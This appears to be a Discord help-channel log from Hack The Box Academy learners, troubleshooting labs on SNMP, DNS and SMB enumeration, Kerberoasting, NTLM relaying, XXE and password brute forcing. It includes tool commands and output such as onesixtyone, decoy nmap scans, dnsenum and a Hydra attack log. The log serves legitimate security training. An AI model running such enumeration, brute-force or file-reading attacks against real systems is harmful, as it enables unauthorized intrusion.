I know about it gimme another one
It worked, I was under wrong user which did not have right credentials to use commands.
Thanks for the tip!
This really isn't the chat to discuss other platforms either there is a general chat if you can figure out how to read and follow instructions in #welcome @rustic sage
Hi guys,
I retrieved something that contains a community string using onesixtyone but am not sure which portion is the actual community string and which portion is not.
/usr/bin/onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp-onesixtyone.txt $target
Trying to complete the rpivot module and I get an error message when trying the command shown
in the square brackets []
tysm!
Hackers , i bought a new acer laptop. It has Nvidia GTX. I was wondering how well Kali /parrot run on Nvidia ? Would love to hear from you guys
Should I use a VM or install it on bare metal?
always use a VM
What does the CWEE cert stand for?
thanks
We won't know for sure until it's released
This one isn't working
It's hanging at the webpage
This is the output of the proxychains command
Congrats but you didn't follow the instructions in them
What ?
I'm assuming I don't need to do anything with this because there are no creds supplied for NTLM
You need an account on https://app.hackthebox.com
It has an app ?
No, app is just the subdomain for the main site
i got it. thanks! it took me a while :/
I guess that's enough for today
See y'all tomorrow
Disregard proxychains issue in my rpivot post, moved to erratum
stuck in footprinting-hard lab. I retrieved the private ssh key from pop3 and retrieved the dovecot-uidlist which doesn't seem too interesting. Where do I go from now? I made it to this point without a solid comprehension of the scenario given. Can anyone give me a nudge?
dovecot is nothing, you got an ssh key though, look who that's for from the email
bob?
Perhaps
But read the email, and who it's for
proxychains4 doesn't work for the rpivot issue either
"proxychains curl 172.16.5.135:80" works though
just gives the source code, but it's easy to find the flag
I cant find the account authenticator on the home screen of my account
can i dm anyone for help?
does PS Remoting work in a reverse shell
Well it won't be on the "home screen", are you looking at academy or labs
academy
There isn't one for academy
oh
It's only on the main platform
(Which is a separate logon for now, until they implement sso)
when i click on to sign in, it gives the 4 options so I chose academy since I have only made an account for that
right.. so when i click login should I click on labs instead?
and i should make a new account like you mentioned above
Yes, your academy login won't work for main
can i reuse my email for both>?
Yes
along with same username
Yes as long as it's not taken on the main site
alright sounds good, thank you so much
sorry for the barrage of questions, i just joined htb and am learning to navigate through all the materials
I'm stuck on this as well. Let me know if you figure it out. I have everything but just get access denied when I try to list \\dc01\c$
did you ever figure this out? I'm stuck there also
Doing footprinting module rn and on the DNS brute force question trying to find host with octet 203. I am just doing the bash oneliner brute force with dig $sub.inlanefreight.htb @[NS ip]. Is it really just my wordlist or is my query messed up
your query and wordlist is messed up
shoot lol
I see that the mail1 name server starts with 201. Is the A record for 203 on there? I'm not able to zone transfer anything from it
I guess I assumed that 203 was a name server that was just under a different zone
Seems like I'm not the only one with the firefox proxychains issue. Did some digging on the history and found a couple of posts
I searched "proxychains firefox-esr 172.16.5.135:80" on the discord and found some results with no clear resolution besides just using curl
use the tool dnsenum with the fierce wordlist from seclists
This is my exact query dnsenum --dnsserver 10.129.133.80 --enum -p 0 -s 0 -f /usr/share/seclists/SecLists-master/Discovery/DNS/fierce-hostlist.txt inlanefreight.htb, you got something with this?
try with each of the subdomains from your zone transfer result
Ah, okay. Thanks

Why am I able to query FQDNs of machines inside of the dev subdomain but not the mail1 subdomain, for example? I did a zone transfer for the inlanefreight.htb zone and don't see a NS record for dev.inlanefreight.htb. Does it exist on the name server, but is just in a different zone?
Because it's not configured to allow it, is the short of it
It's also not in that dns zone to allow (if I'm remembering zones right for dns, which I'm probably not)
mail1 is presumably a mail server, i.e. a host, while dev is a separate DNS zone.
The name server responsible for dev is declared in the zone file.
I’m trying to deauth my network with aireplay using 2 adapters. I’m not sure why it’s not working? Any advice please
is it really yours
This isn't the place to ask for assistance with this
Hey at WINDOWS ATTACKS & DEFENSE \ Kerberoasting
I did the attack and the second question wants me to find it from events which is event id 4769 there is not a sign of any logs
Have you logged in to the DC? You need to look at the logs from the DC, not those from the client.
yeah i did rdp as the user given to me
Then carry out the attack again. You should see the entries in the log
what does " What is the path to the htb-student's mail?" mean
I can't find any directories that are called "mail"
Yeah, read the logfiles there
||environment variables||
hi guys whats goin on ?
this isn't a gen chat - read #welcome and follow instructions to gain access to more of the server
how much does it cost to get CWEE modules?
still the same i did it 4 times and even changed the machine
god i hate logs and defensive
I read in the forums that there is a bit of a technical issue ... some people used the admin hash from the previous exercise but even trying that didn't work ... still stuck on it though
#modules message check this message
Only calculation that needs to be modified is that, the price of the advanced cert is not 210$ but it's 318$. That's 108$ more value to the gold annual.
bruh all the time it had space in the front
it does not let me import or do anything
Get-GPPPassword does not output anything
yeah also the user Exec policy didnt allow it so i changed to htb user
i did modify it but still didnt work but htb-student fixed it
Thanks tho ❤️
The knowledge from CPTS certainly helped me a lot with the attacks.
yeah i am currently doing the assignment but after I get my sec+ in jan ill start studying for CPTS
I love hands-on certs more than exams, and CPTS and OSCP are both good
i just hate windows machines
i can finish linux blind but windows, god i hate it
I have not done OSCP and therefore cannot judge it.
If you know the attacks described in the CDSA modules from OSCP, that helps just as much as if you know them from CPTS.
It doesn't really matter where you know them from. But it helps a lot to know the attacks
CDSA is almost only Windows
yeah fs when i study for CPTS ill take notes and stuff currently im getting basics of each tool to survive
when performing a SSH in HTB academy which password is required when prompted to enter the password?
it should tell you
make sure your vpn is on
Ok. So i tried to read /etc/passwd with xxe payload. i discovered that image/svg+xml content type is allowed by server and .svg extension but i need to have a jpg file signature to make it work
But server is returning the same thing i gave to it but in img tag
Why is it that I'm getting a different result from someone that performs the same Nmap scan as me?
I'm doing the firewalls evasion medium lab and I've been stuck on it for 2 days now and decided to look up the answer. I type the exact command they do, the scan went through, but I still have no domain.
The question was to determine the domain that is on port 53.
Nmap --script discovery <ip> -T4
I tried all the -T combinations (0 to 5), still no domain. 😡🤬
There's really no need to cross-post, the -T will make zero difference to the results, it's just for the speed of the scan, this definitely doesn't look like what I did for that lab, but I don't have my notes in front me, there's so many options Nmap has and you're using almost none of them
didn't the question ask for dns server version? not sure why you're trying to get the domain. use one of the nmap dns scripts
That was just an example of what the dude on yt did and he got it right with nmap --script discovery -T4, but when I do the same thing after trying so many different other combos, still not working
It just doesn't make sense for what the question is asking if it really is the DNS server version like Xre0uS said
I also remember I had to do one of those labs in the Pwnbox, it wasn't working from my VM
yep need pwnbox for this one
i discovered where was issue
now its working
Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio.
I found the DNS server version from NETWORK ENUMERATION WITH NMAP - Medium Lab , but seems to be not correct. Is here any other way?
```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sSU -p 53 -D RND: 5 -g 53 --script dns-nsid 10.129.55.216 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 06:53 EST
Nmap scan report for 5 (0.0.0.5)
Host is up (0.0055s latency).
PORT STATE SERVICE
53/tcp filtered domain
53/udp open domain
| dns-nsid:
|_ bind.version: 9.11.4-P2-RedHat-9.11.4-26.P2.el7_9.9
```
use pwnbox
Thnx bro, it worked without using the script
hello, i'm stuck in "password attacks" "network services", i found the user for the smb connection but when i am connected i can't ls or dir to find the flag. i have this error: "NT_STATUS_ACCESS_DENIED listing *"
if you get that means the user does not have rights to read the smb share, try another user/protocol/share
ok thanks, i found it
yo
anyone could help with WINDOWS EVENT LOGS & FINDING EVI
cuz i read it 4 times and didnt understand
What exactly don't you understand?
I'm trying the Web Attacks Skills Assessment, and I am having a lot of difficulty resetting the admin password, I keep getting an invalid token. I tried looking at the source code to see where the token is generated from but I can't find anything
Think about what you learned in the module.. all topics play their role in this assessment.. Sometimes the change of a single word might do the trick
I hope this little hint helps if I am not wrongly remembering this assessment
hey i got a quick question for a chal i gotta rdp from my own to kali then rdp from kali to windows on local network but when i use xfreerdp it cant resolve the local name which is WS001
hello
What module is this?
Windows Attack and defence - PKI - ESC1
anybody knows how to hack
no clue whats that
Haven't done the module in question, but have you added the IP to /etc/hosts?
then whats hack the box
that does not have any ip
jk what do you need
i want to learn hacking
It can't not have an IP if it's a host you can RDP into
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
i didn't get that much but would adding it to /etc/hosts solve it?
ty
yes it links a hostname i.e. ws01 to an IP
no
ok
```
┌──(root㉿kali)-[/home/kali]
└─# echo "WS001 10.10.10.10" > /etc/hosts
┌──(root㉿kali)-[/home/kali]
└─# su kali
┌──(kali㉿kali)-[~]
└─$ xfreerdp /u:bob /p:[PASS] /v:10.10.10.10 /dynamic-resolution
[09:24:41:120] [4738:4739] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[09:24:41:120] [4738:4739] [ERROR][com.freerdp.core] - failed to connect to 10.10.10.10
```
I suggest you read the #rules, if you want to learn ethical hacking, you're in the right place, if you want someone to hack your ex or something equally dumb, get out
bro you just overwrote your /etc/hosts
its htb machine its ok
> and >> are two different things
i want to learn ethical hacking
yup gotta keep in mind lol
anyways if you're gonna specify an IP you don't need to add to /etc/hosts, in this case make sure your target is the IP specified, it seems like that host doesn't exist
Then the article on getting started should help, then you can get on HackTheBox Academy
ok
yeah that was my problem the hostname is given without ip and it is not resolved
Maybe we're missing some context not having done the module, and you're meant to connect a different way, though RDP into it sounds pretty clear to me
Where did you pull the 10.10.10.10 IP from?
random
Then how would that work 
idk im desperate to any idea
i even can send the html if you cant access it but i dont see anything else
no ip no a way to connect thats shown just the question is there
Ws001 is 172.16.18.25
The second section of the module has the lab ips listed
yuppp worked thanks
Ah, so just a reading issue lol
Anything mentioned/found in a module section can and often is relevant later, that can be hostnames, IPs, usernames, passwords
alright thanks guys
no problem
Nice to see there's a terminate machine button now 😅
On Intro to Assembly, Skill Assessment Task 2, I finally have my code within the required specifications but am still receiving a failed to run shellcode error. I'm not sure if it's the code itself, or the manner in which I am trying to send it, but anyone around to lend a hand??
you're supposed to send it as shellcode, and debug with gdb to make sure it works
I've sent the shellcode directly and tried writing to a bin as well. I don't want to post spoilers so I don't want to say much else, but I'm having absolutely zero luck. Hard stuck for days
did you run it through gdb to find out what went wrong?
Hello everyone
interesting, I did just notice it wasn't, let me try again
sorry
Hi all. Stuck in Introduction to Web Applications module
I can't answer the question..
Check the above login form for exposed passwords. Submit the password as the answer.
Can anyone tell me what needs to be done?
section?
oops I meant hash but you got it
okay, so cracking from /usr/share/responder/logs will be my new standard I think, I just know it will work properly from there and is probably "meant" to be done that way.
BUT
in the end, copying the hash into subl did not cleanly paste everything into one line. Which is irritating. But at least I got it to work now
are you using tmux?
I am indeed sir
sometimes hashes do break for me, I just combine them back, nbd 🤷♂️
yeah tmux copy mode will break long strings into lines
I did and It worked because it all worked fine on the ssh attack box but on my something was different so it HAD to be the hash not being copied correctly. At least I know that running from /usr/share/responder/logs wont give any of those types of errors. It will either take for ever or get cracked. Nothing in between or hash errors at least
all good. its all working smoothly now
I knew going to sleep would make things better
thank you
hashcat should throw errors for formatting for most hashes, not sure why it doesn't for ntlmv2
and don't run hashcat in a vm if you are, ntlmv2 shouldn't take long with rockyou
yes, hashcat uses gpu to crack hashes, vms don't have gpu hardware access and will fall back to cpu, that and vm overhead makes it very inefficient to run hashcat in a vm
what do I have a 4070 for if not to make use of it, will do brother. Thanks for that too
HOOOOLY that was fast
hahahah
yeah you've been wasting a lot of time not using that 
rn im doing the Hashcat module, the mask attack is so awesome, just wanna say 😄
it's good if you know the general format of the password
yes like a reset token or a pw manager uses like from apple xxxxx-xxxxx-xxx and so on
Hello
I'm studying the ntlmrelay module with ntlmrelayx.
We can provide multiple targets with the -tf option.
But I don't understand how it operates when multiple targets are provided.
I wasn't able to find info about it
it just relays the connections to all the targets specified
Let's say there are 2 targets and client 1 connects for the first time, it will relay to target 1 and target 2 or just target 1?
both
usually you target a single vulnerable machine but could be useful to test everything
How is it possible when both targets will provide different challenges?
I read the source code, it seems it chooses a new target, the next in the list for every new connection
Adding support for targets with users specified and multiple relays using same SMB connection on to ntlmrelayx.py.
Hello, has anyone done the Injection Attacks academy module (the one from the Senior Web Pentester path) and would discuss the flag in the skills assessment lab?
@next bronze thanks a lot.
I didn't know if it was possible or not
from reading the logs it's one connection, multiple targets, I guess whichever connection succeeds gets relayed back, the target doesn't know which server it's talking to after all
@next bronze it seems it uses SMB reauthentication for this trick
ah I see
Hello, if i want to change my nickname do i have to contact an admin.
i see i need permission for that
your nickname is tied to the one you've specified in the registration of your account on hackthebox
Hi, about Attacking Common Applications - Skills Assessment II, trying to find the application password. Couldn't find it with brute force and neither in git.
May I have some help ?
check git again
Can I DM you ? I have access only to public projects in git
register an account and have access to internal projects
Thanks !
Hi everyone, I am not able to spawn a target system in my academy modules. Has anyone faced a similar issue?
On clicking "Click to spawn target system", the text changes to "Target is spawning" but then changes back to "Click to spawn target system"
refresh the page and try again👍
I did; cleared the cache and cookies too. Didn't work 😦
strange
change vpn region and try again, i was having issues with us-academy-1 last night (slow connection) switched to 3 and the speed/responsiveness improved 10x
literally had such variable ping, one time was 1.5k response
🙃
I did change the VPN but still same behaviour. Although if I see the requests in the network tab, the request for getting the spawned target IP does have the IP in the response. It just doesn't render on the webpage
I checked on a Windows machine and it turns out the behaviour is this on my Linux machine only.
I upgraded my system, and cleared cache and cookies. But just the Linux browsers are facing this problem
i have always used academy from my windows host, linux guest as the attack machine ¯\_(ツ)_/¯
i've also had the occasional time of downloading the vpn from linux, but i never bothered to look for that issue
If it's repeatable I'd recommend raising as a support issue with the team, not heard of this kind of issue recently (excluding infra issues)
Include the module / section / target, browser type and version 🙂
wdym htb infra never has issues 
Also any plugins you have enabled in the browser
I didn't say htb infra never has issues
i meant i'm saying that
touché
in response to "excluding infra issues"
as i just said a minute ago; US-academy-1 was literally giving me frustratingly unresponsive targets
it's brave, it's always brave causing problems 
I recently tried unlocking my first module with the 60 cubes they give you, but it won't unlock
am I missing something or am I being an idiot?
super new to this, and I'm transferring from a combat role in the military so I'm adjusting 
disable adblock and pop-up blocker
most common issue
otherwise there's always asking support on the website you're using
😉
you're probably right lmao.
probably am
:P even if you think it's disabled (sometimes it's not)
though funny thing is i have adblock running for academy and never had issues: but i guess i'm just speshul
Hello,
Kind of a random question, but do certain module questions not necessarily build upon the previous?
For example in "Investigating with Splunk - UNDERSTANDING LOG SOURCES & INVESTIGATING WITH SPLUNK", can someone tell me if Question 3 is at all related with Question 1 or 2 before it?
Link to the specific module:
https://academy.hackthebox.com/module/218/section/2357
My guess is no as the 1st two are about dumping credentials but the 3rd seems like a different topic - C# Injection/Execute-Assembly
Only asking this because I was not able to find the answer to #3 so I tried to see if I overlooked something from the 1st two questions?
Wish all questions had a Hint button. 🙂
Thanks.
I am trying to do some simple exercises in attacking common services and I can't seem to connect to any port with Hydra but it works fine with openssl, nc or telnet. I tried attacking rdp, https and SMTP
I get errors like these
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-23 15:32:53
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 333 login tries (l:1/p:333), ~21 tries per task
[DATA] attacking http-gets://10.129.203.7:443/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Could not create an SSL session: error:00000000:lib(0)::reason(0)
[ERROR] Child with pid 5905 terminating, can not connect
[VERBOSE] Disabled child 10 because of too many errors
[VERBOSE] Could not create an SSL session: error:00000000:lib(0)::reason(0)
[ERROR] Child with pid 5896 terminating, can not connect
[VERBOSE] Disabled child 1 because of too many errors
[VERBOSE] Could not create an SSL session: error:00000000:lib(0)::reason(0)
[ERROR] Child with pid 5899 terminating, can not connect
[VERBOSE] Retrying connection for child 4
[VERBOSE] Could not create an SSL session: error:00000000:lib(0)::reason(0)
[ERROR] Child with pid 5910 terminating, can not connect
[VERBOSE] Retrying connection for child 15
[VERBOSE] Could not create an SSL session: error:0A00010B:SSL routines::wrong version number
[ERROR] Child with pid 5895 terminating, can not connect
[VERBOSE] Retrying connection for child 0
I even tested on Parrot and Kali
Is there even anything to brute-force on that website at 443? don't have anything in my notes on that
your hydra syntax is wrong, and why https-get? I don't remember attacking common services having any web attacks
There is a basic auth as soon as you check 443
It's exposed and I got a name I found through SMTP so I want to find a password for it. What's wrong with the syntax?
what section is that
easy skills assessment I think
Maybe my approach is wrong but I like to dig into weird issues during exercises so I don't get caught during something real
yes easy
I just find it weird that I can't connect with my browser but Hydra can't
Hi everyone, I'm stuck with the Linux Credentials Hunting section... I'm trying to brute force kira's ftp password with the mutated password list... is it the right way or am I just wasting my time? I read on the chat that the password must be in the first 14k but I already passed that and nothing was found... any hints?
I don't think the -S flag needs to be there
I get the same result with and without
though if I check the network tab of the debugger in my browser, I don't see any packet sent when I hit login. I wonder if it's just some weird default browser response?
which list is that? there was a new list we had to create for that question if I remember correctly
maybe it's just a dummy page as an example? I don't think I bothered to do anything with it
you should only attack the services like what's in the module
the one in the zip resource of the module
I am still curious as to what the issue is here lol, I'll try to get back on track
mutated with the custom.rule file
did you check the hint for that question?
yes it talks about a LoveYou1 password but it doesn't work... wait maybe I can create a new mut_list
exactly!
hello, can someone help me with the challenge cubemadness 2 in game pwn
Module: Attacking Enterprise Networks
Section: Web Enumeration & Exploitation
I'm working on the last question that asks me to use command injection to get the flag in the web root. I'm able to run "ls" and see the name of the flag (different from "flag.txt"), but I can't figure out how to read the contents of that file. I've tried base64 encoding my command, varying the capitalization of letters, and a lot of other things from the command injection module, but nothing is working.
read and follow #welcome, then you can ask in #challenges
ok
are you gonna help me
Got it, must've fat fingered my answer the first time because I already tried it 2 hours ago lmao. Ty all.
I know nothing about the challenges, but now that you've verified you can see the dedicated channel
ok no problem